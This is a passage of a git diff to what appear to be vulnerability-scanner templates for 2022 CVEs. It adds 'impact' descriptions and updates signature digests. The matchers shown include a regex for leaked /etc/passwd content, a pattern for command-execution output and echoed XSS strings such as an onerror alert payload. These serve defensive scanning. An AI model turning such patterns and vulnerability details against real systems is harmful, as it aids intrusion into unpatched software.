@@ -51,4 +53,4 @@ http:
       - type: regex
         regex:
           - "root:[x*]:0:0"
-# digest: 4b0a0048304602210089b3b41b35bf036b093913ee27125d26a89a73715a30d1645050026294f64953022100f66f21808c0478583efd38339fb8598e8f29b3ea87f18343c80243aa3f19ecd1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b4f85787aab5815d6f131786de34517fb267354fe3917d27252270aadbfaf1b402206f2e4cd176fae4251cf216996abfdef755564fe9eb6a813eea958dc40dd3d5ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-36804.yaml b/http/cves/2022/CVE-2022-36804.yaml
index 3e2652afb4..7ebf539d20 100644
--- a/http/cves/2022/CVE-2022-36804.yaml
+++ b/http/cves/2022/CVE-2022-36804.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Atlassian Bitbucket Server and Data Center is susceptible to remote command injection. Multiple API endpoints can allow an attacker with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request, thus making it possible to obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. Affected versions are 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     Apply the latest security patches provided by Atlassian to mitigate the vulnerability.
   reference:
@@ -72,4 +74,4 @@ http:
         group: 1
         regex:
           - 'uid=.*\(([a-z]+)\):'
-# digest: 4a0a0047304502203c17fc41cb6db4fa5249401c487fb7a171d24c2de8b2a7ed52bb588b7ca6b14e02210083a9ec6592af2c5223af43ee5502fa8acf0b0c14f52ea2a5f528dfb39c8d2f15:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220379e23fe900876847839949981dfaf9ce966b93661a54d2c380708966266ba0a022100f34647ce4e233bbe14658b27f6ca44d9b6bc88b26adc5553314866f8bd9fa4a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-36883.yaml b/http/cves/2022/CVE-2022-36883.yaml
index 951e56e7c7..8cda7992a9 100644
--- a/http/cves/2022/CVE-2022-36883.yaml
+++ b/http/cves/2022/CVE-2022-36883.yaml
@@ -5,6 +5,8 @@ info:
   author: c-sh0
   severity: high
   description: Jenkins Git plugin through 4.11.3 contains a missing authorization check. An attacker can trigger builds of jobs configured to use an attacker-specified Git repository and to cause them to check out an attacker-specified commit. This can make it possible to obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive data and unauthorized actions being performed on the Jenkins Git plugin.
   remediation: |
     Upgrade to a fixed version of the Jenkins Git plugin (>=4.11.4) or apply the provided patch to mitigate the vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402207959a0333620ff545a33202374cdf26271a589048dd25e00c8b91ec27eaee3cc022021cec3a8c15ea65c5fcf59810bff219f0a99a4468c3965ede3da71923306eed8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100a086de6801004ea84753d6716189660f5ba05574694c88aab48f8f5a938579f4022067bfb0b7b89a94987199ba050f4b46fe5c56dad92e28fedb975531df82bf5f8d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-37190.yaml b/http/cves/2022/CVE-2022-37190.yaml
index 0462bd6f2e..83aa73fa1b 100644
--- a/http/cves/2022/CVE-2022-37190.yaml
+++ b/http/cves/2022/CVE-2022-37190.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     CuppaCMS 1.0 is vulnerable to Remote Code Execution (RCE). An authenticated user can control both parameters (action and function) from "/api/index.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patch or update to a patched version of Cuppa CMS v1.0 to mitigate this vulnerability.
   reference:
@@ -71,4 +73,4 @@ http:
         regex:
           - "<td class='td_key'>(.*?)</td>"
         internal: true
-# digest: 4b0a004830460221008b0fed2ba157593d1ddc3f52dfeeb714546e9a2ad280767ce670faf35f8f0063022100ca8d1fe49edb81eddda8ef7f7fda3f44608ff8965305875e1bfa88797c58d886:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022013d8d78ba7ba22f558b4b06c81567c57f143482fbdc1b69c469dfcc6faadbf6a022100badd5afad77be9df7b1d7c0114947d9e4847c8a2367c479fa361503f6376b1ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-37191.yaml b/http/cves/2022/CVE-2022-37191.yaml
index 6dcb4df682..4644203b76 100644
--- a/http/cves/2022/CVE-2022-37191.yaml
+++ b/http/cves/2022/CVE-2022-37191.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.
   reference:
@@ -71,4 +73,4 @@ http:
         regex:
           - "<td class='td_key'>(.*?)</td>"
         internal: true
-# digest: 4a0a00473045022069f4a863924b328044cf9a97ccad2ad2b06219883f77fde24c6fdcea6c039ed0022100ecfa17b524c5efba777f5836ccc1fffc2b8c9033771a3d520f3a301a165dd16b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cc7e922d0324ba2b1709b8b495dfdc8031cd1ab4e366d4ada024ad949f767bd3022100e38ec0f790546d9021fb2c468b581f83744c11697767b506ffed2e0342ed7dec:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-37299.yaml b/http/cves/2022/CVE-2022-37299.yaml
index c58ad01be2..ded443fc5e 100644
--- a/http/cves/2022/CVE-2022-37299.yaml
+++ b/http/cves/2022/CVE-2022-37299.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
   remediation: |
     Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aa4dee3b856981b21f147c0148a389445c6391e81b896e847429494ec90a6c19022100d7922cdc546f846b17b02b8986f34e7220f034e00fd53a0ea4c5e453704f783a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201c558e66222bd01aa52e167174393bb86ea1bb2e8ed27ba2ab92d34595508a9f022073d77fb4b4e04aab5e04726afb24adc40ed4ea6916c6036d2e073365a1f6cf35:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3768.yaml b/http/cves/2022/CVE-2022-3768.yaml
index 66a986fcd3..b8dab50da9 100644
--- a/http/cves/2022/CVE-2022-3768.yaml
+++ b/http/cves/2022/CVE-2022-3768.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: Fixed in version 1.3.12
   reference:
     - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3
@@ -50,4 +52,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "Batch Mint NFTs")'
         condition: and
-# digest: 490a0046304402200d8217d4d5390d02d3d8fa3f442b3c44c69d257187142880edb22335e217062b022057cee1a7e58773babd137d01978bc1fd3a19f68b82b7895f14cf8147774e2cca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206b9258348f05845ae46af6dcdff49d3854af6aec5701b02618da0ec39ecbfc5802202c303b54491414eaf4b71439db24beb886c16a49bf3a5fd94f2bd34edce512d4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3800.yaml b/http/cves/2022/CVE-2022-3800.yaml
index 298607a34e..3f84cd21c4 100644
--- a/http/cves/2022/CVE-2022-3800.yaml
+++ b/http/cves/2022/CVE-2022-3800.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.
   remediation: |
     To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks.
   reference:
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type, "application/json")'
           - 'contains(body, "usesysid")'
         condition: and
-# digest: 4a0a00473045022052c76dbc33bf9e2b4bb3e0e7707dd4ef1b3e82ac669d6d79193152167a2300c902210094d4f75a06e3bad0bdc0196fb4d18758eb68ecc42e51605c03fbfb35e47de12c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210086919f5126566069502f5eefc9c678ec8d5c01679dbadd91dc7720bcfbdc0fde0220496c91eceed1c97c6528fd2c3eefec8c0b562f4fe37613af65ed0fa559833ac1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38295.yaml b/http/cves/2022/CVE-2022-38295.yaml
index c131ba6d1e..ae4db84d9a 100644
--- a/http/cves/2022/CVE-2022-38295.yaml
+++ b/http/cves/2022/CVE-2022-38295.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.
   reference:
@@ -64,4 +66,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201d00b6013e7392c1302b8fe210733fdd23de3e2302f668f26c7b0464fa895d3002202cd76cf5532ca9c66c5ea90f10aa51c302b8c34cf76e2ab9faf9f9a4b088d1af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e0815231168348033e1e527cd9c4a36727a5e312b389e4095601254fe647be9402201f3ecd2f7c277071041607d0a11b3ced71fc11c55aa36f3fae1ac5a2b5030288:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38296.yaml b/http/cves/2022/CVE-2022-38296.yaml
index 2365bae9c1..f520cf89d2 100644
--- a/http/cves/2022/CVE-2022-38296.yaml
+++ b/http/cves/2022/CVE-2022-38296.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system.
   remediation: |
     Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability.
   reference:
@@ -101,4 +103,4 @@ http:
         regex:
           - '"name":"(.*?)",'
         internal: true
-# digest: 4a0a00473045022100a7f3de3ed82fe990e630918b36cc9f262fac965f74e8b865d7d91b3f8071769402206ae2e7e73854e6af70dbf891ada8b0feaa8403f0ffb909182abbfdba414db19a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d22e398bc267a48bafaa6346cf28f328f919aec46645cd10ade334b7d985b23502202713b0f582a809fe9e170ee53d6a799c6528452abd6e20518e92bcc5858f49bc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38463.yaml b/http/cves/2022/CVE-2022-38463.yaml
index e62482d136..6ecdd69eca 100644
--- a/http/cves/2022/CVE-2022-38463.yaml
+++ b/http/cves/2022/CVE-2022-38463.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance.
   remediation: |
     Apply the latest security patches provided by ServiceNow to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502203b7dd5b8686b623b973a04e2948d27fa165f9bfa9b444926f32379717c53c2d9022100f08a118d5fc9e99ff6252473320eb7885f28d5fde3879a2e962d74c1d4000064:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205e0127f2d13b12f4590d1c3757279b51cf811493657d74e93262d1d12ddc01be022100c63e1ba90a5bddc67c8a5c661db18aaee11bd456a0a994145e02de96d04539a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38467.yaml b/http/cves/2022/CVE-2022-38467.yaml
index 97a7dce914..f8f9cea046 100644
--- a/http/cves/2022/CVE-2022-38467.yaml
+++ b/http/cves/2022/CVE-2022-38467.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: Fixed in version 1.1.1
   reference:
     - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53
@@ -44,4 +46,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_1, "CRM Perks Forms") && contains(body_2, "<img src onerror=alert(document.domain)>")'
         condition: and
-# digest: 4b0a00483046022100fcbc637dea924f94c94757512abdb7370b1fbdacb2300fdb8a21bb7ae23ff7af022100cf3a95e1f9e489e404b7fbbb14fd719b10b1a6fa231cf59535f1bd2cfd3857e3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100953ea1dd1e6b98577ad0550a3fcfec0b1c0ff920b5d79f60ae85829dd117ad690220188acc3cd05037b47925100c66dc080b34092eff1d65219c210ccc982f20cfc7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38553.yaml b/http/cves/2022/CVE-2022-38553.yaml
index 086ed3571b..372770ab9f 100644
--- a/http/cves/2022/CVE-2022-38553.yaml
+++ b/http/cves/2022/CVE-2022-38553.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ffbb557996881d4b812b8bc486c4b6d1761a4beeea9dc005c1d7cd0f0a726ce2022100c1cad263d0934eb9bdec6aece9176d91de3256bd631c611d22ad822ce5906544:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009f108f8537eb8b7a97934c7b25487f0409885355153c837dd3ebd747c272451e022100911882d84ffbe8d82d4b1e7b13a257bad10c84cb26fe47e161de89c4fe81b2b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38637.yaml b/http/cves/2022/CVE-2022-38637.yaml
index 27217f1c17..6a68b302ce 100644
--- a/http/cves/2022/CVE-2022-38637.yaml
+++ b/http/cves/2022/CVE-2022-38637.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php.  An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
   remediation: |
     Upgrade to the latest version to mitigate this vulnerability.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100b4258f6026fa614c9aaa9f2cf0e706af79caf8f9ccc2b8b9a49f2ac8f92a37eb022009de2966dc5b9d4890ce5d9149aa65e2bdfd3bf14fffe7082b12cb2e40219d36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cdcbf0a4abcfb4a989d85cb0de824560dc8a6d2fe0e4de92b41ddb8545eac2f40221008e44a8f96379e49724bcbf3c3df3361bc15a0be5833269d4dacf0c70d95115b8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38794.yaml b/http/cves/2022/CVE-2022-38794.yaml
index b81887f9ed..273b3669f8 100644
--- a/http/cves/2022/CVE-2022-38794.yaml
+++ b/http/cves/2022/CVE-2022-38794.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Zaver through 2020-12-15  is vulnerable to local file inclusion via the GET /.. substring.
+  impact: |
+    This vulnerability can lead to unauthorized access, data leakage, and remote code execution.
   remediation: |
     To remediate this vulnerability, ensure that user input is properly validated and sanitized before being used in file inclusion operations.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100c0515382d6416e7d8f37cc1590afabdabe11ac951c9de21aad4d9dc8b852e0d602202a87cabbb621a709b1e2136ff13797b0aa28836ea6a8d36d9863d45ffc64fb48:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d593e552e31a80a94e3a9558203b1df2c4499a9529368d4600acf3bb560be349022014c44af3fbf9fa80a99664f061da65c0b56753dff9f0d5662dd9ece10725b46a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38817.yaml b/http/cves/2022/CVE-2022-38817.yaml
index 71ed0c49f1..8da106dc5d 100644
--- a/http/cves/2022/CVE-2022-38817.yaml
+++ b/http/cves/2022/CVE-2022-38817.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure.
   remediation: |
     Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022023cd0298ba78355efc105d15d02f7e11a42c0e435db5ca23c62a8821904575840221008907db8ae2e82142ebd27055a08fbc5438e45e3e515d5646e6a526863055c30d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008fae1e1019047cd5831d8a81dccada8fde256bf3871ab4e395ab5cc93fe6e98a0221008e0e3094bd027eaf96e86e05f1a11c3a45e2af41a546997be7703fdaa4623374:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-38870.yaml b/http/cves/2022/CVE-2022-38870.yaml
index a6f6328fe5..6db0ee7847 100644
--- a/http/cves/2022/CVE-2022-38870.yaml
+++ b/http/cves/2022/CVE-2022-38870.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Free5gc 3.2.1 is susceptible to information disclosure. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could result in unauthorized access to sensitive information.
   remediation: |
     Apply the latest patch or upgrade to a patched version of Free5gc 3.2.1 to mitigate the vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402205afa0fb888ce9a7a0a708f720023fb2ecf1a69da749ab01e1ce9be4bae89e85b02206699d0ccc38f9aa67881cf4aa846bd1b8fc1b42ec1d87358ec68ed15c3a70dd8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022027ea46b25b7320b71ef586a5dd1013a503ec08deb9c7dba47bd50499f23d5e2b0220047dbda455d48c068e46110e6bc95df67b0179774fcfe960de3fa4b08afc6a91:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3908.yaml b/http/cves/2022/CVE-2022-3908.yaml
index f1b594cb83..488eea58d0 100644
--- a/http/cves/2022/CVE-2022-3908.yaml
+++ b/http/cves/2022/CVE-2022-3908.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Helloprint plugin before 1.4.7 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, potentially allowing an attacker to execute malicious scripts on the victim's browser.
   remediation: Fixed in version 1.4.7.
   reference:
     - https://wpscan.com/vulnerability/c44802a0-8cbe-4386-9523-3b6cb44c6505
@@ -46,4 +48,4 @@ http:
           - 'contains(content_type_2, "text/html")'
           - 'contains(body_2, "Translation added\\\"><script>alert(`XSS`)</script> successfully")'
         condition: and
-# digest: 4b0a00483046022100e7084a6e142756511d08616ed65fb05d0099458e2488a645d4a33fd82f76b39d022100b7217b4ece7122e1ef37896fc5d75a031b03d21f59be7ca51a786bbbd53a742a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022001eac239a1339bf9571a59ece9a64f297e5f390425950bd73280e569415ad04a022100e75c2912c225a67370e95ae82675288c107111b90afdf93df2fff0697e71de37:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-39195.yaml b/http/cves/2022/CVE-2022-39195.yaml
index 97f0b93edc..213ca45055 100644
--- a/http/cves/2022/CVE-2022-39195.yaml
+++ b/http/cves/2022/CVE-2022-39195.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022078dec19149c00e66eaf3775b880a2633940cf17ead0c73ed314060d48a55110a02210088a514ea2ea7e4224fb4aad6bfd3f7417fcd2578a6be20834fc19f3a7ba8264a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100daefea03bf14e5190d5b12c53ecb756ee1e96d33fd66a04d6b5a745f122d66de02203df0cd44412a26c44b7c71a676f6626898778747dee6ab7e3978de7ff97f2e63:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3933.yaml b/http/cves/2022/CVE-2022-3933.yaml
index b4bd22f66d..989555ad3f 100644
--- a/http/cves/2022/CVE-2022-3933.yaml
+++ b/http/cves/2022/CVE-2022-3933.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Essential Real Estate plugin before 3.9.6 contains an authenticated cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters, which can allow someone with a role as low as admin to inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow theft of cookie-based authentication credentials and launch of other attacks.
+  impact: |
+    An authenticated attacker can inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or further attacks.
   remediation: Fixed in version 3.9.6.
   reference:
     - https://wpscan.com/vulnerability/6395f3f1-5cdf-4c55-920c-accc0201baf4
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "><script>alert(document.domain)</script>")'
           - 'contains(body_2, "ere_property_gallery")'
         condition: and
-# digest: 4b0a0048304602210092b855aa714ca808b12a9f3f8d7fe75130f1f8983bda9a6ef653f06eca7957ed022100b7c43cf3aa74f39f7dd2a16bd79fd7ba535c35d944d884464b37ce5a5ba6a673:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204e2381f0bf62ac5186b4e8313a5948774f695922e7bd8d648cf3dd9355ef986d02200d4220943e3f4727c4ae0485b37abdd438b8e2e453fe4856d072aa8ba7e7bdc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3934.yaml b/http/cves/2022/CVE-2022-3934.yaml
index e1f4e10e9e..4bb79ea4bf 100644
--- a/http/cves/2022/CVE-2022-3934.yaml
+++ b/http/cves/2022/CVE-2022-3934.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress FlatPM plugin before 3.0.13 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape certain parameters before outputting them back in pages, which can be exploited against high privilege users such as admin. An attacker can steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: Fixed in version 3.0.13.
   reference:
     - https://wpscan.com/vulnerability/ab68381f-c4b8-4945-a6a5-1d4d6473b73a
@@ -45,4 +47,4 @@ http:
           - 'status_code_2 == 200'
           - 'contains(body_2, "alert(document.domain)") && contains(body_2, "Flat PM")'
         condition: and
-# digest: 4b0a00483046022100a86aa711f963e0092b7e4beb28163e7e9e83d0f29af05baee37deec1ab9a53dd0221008d901eb9a565bf0183d0ccb2a4bf056fa17128e2f40a90a948301684be9b30e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100aea8aaa612715f57eb80bbb0003231b5f973a9f463ac60a278f5048bcff2a78a022100f0684063edd7385e3680707e82c85e87e77440c64614c22c09e9f07c87b01257:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml
index 864180647a..0943853d99 100644
--- a/http/cves/2022/CVE-2022-3980.yaml
+++ b/http/cves/2022/CVE-2022-3980.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     An XML External Entity (XXE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
   remediation: |
     Apply the latest security patches or updates provided by Sophos to mitigate the vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
           - "status_code == 400"
           - "len(body) == 0"
         condition: and
-# digest: 4a0a004730450220295f8a429001f1b1c9c356ae450d47f6ded133ec77b1da6349f18f023f62ed0602210086b7433a4d23e5e53d5db0141bd5570d0fbb7e05e98b3433c522eb88ce7ba27a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f015c0b697e3590aff9d3433dd84b531a69e646c16abdf751e3f6a49d5661efe022100977c1221443d5f0e5f4e918f1374e8ca756a22624a96726bab7d7f9805b21349:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2022/CVE-2022-3982.yaml b/http/cves/2022/CVE-2022-3982.yaml
index f56074c730..58163ed214 100644
--- a/http/cves/2022/CVE-2022-3982.yaml
+++ b/http/cves/2022/CVE-2022-3982.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Booking Calendar plugin before 3.2.2 is susceptible to arbitrary file upload possibly leading to remote code execution. The plugin does not validate uploaded files, which can allow an attacker to upload arbitrary files, such as PHP, and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    This vulnerability can lead to remote code execution, allowing attackers to take control of the affected WordPress website.
   remediation: Fixed in 3.2.2.
   reference:
     - https://wpscan.com/vulnerability/4d91f3e1-4de9-46c1-b5ba-cc55b7726867
@@ -83,4 +85,4 @@ http:
         regex:
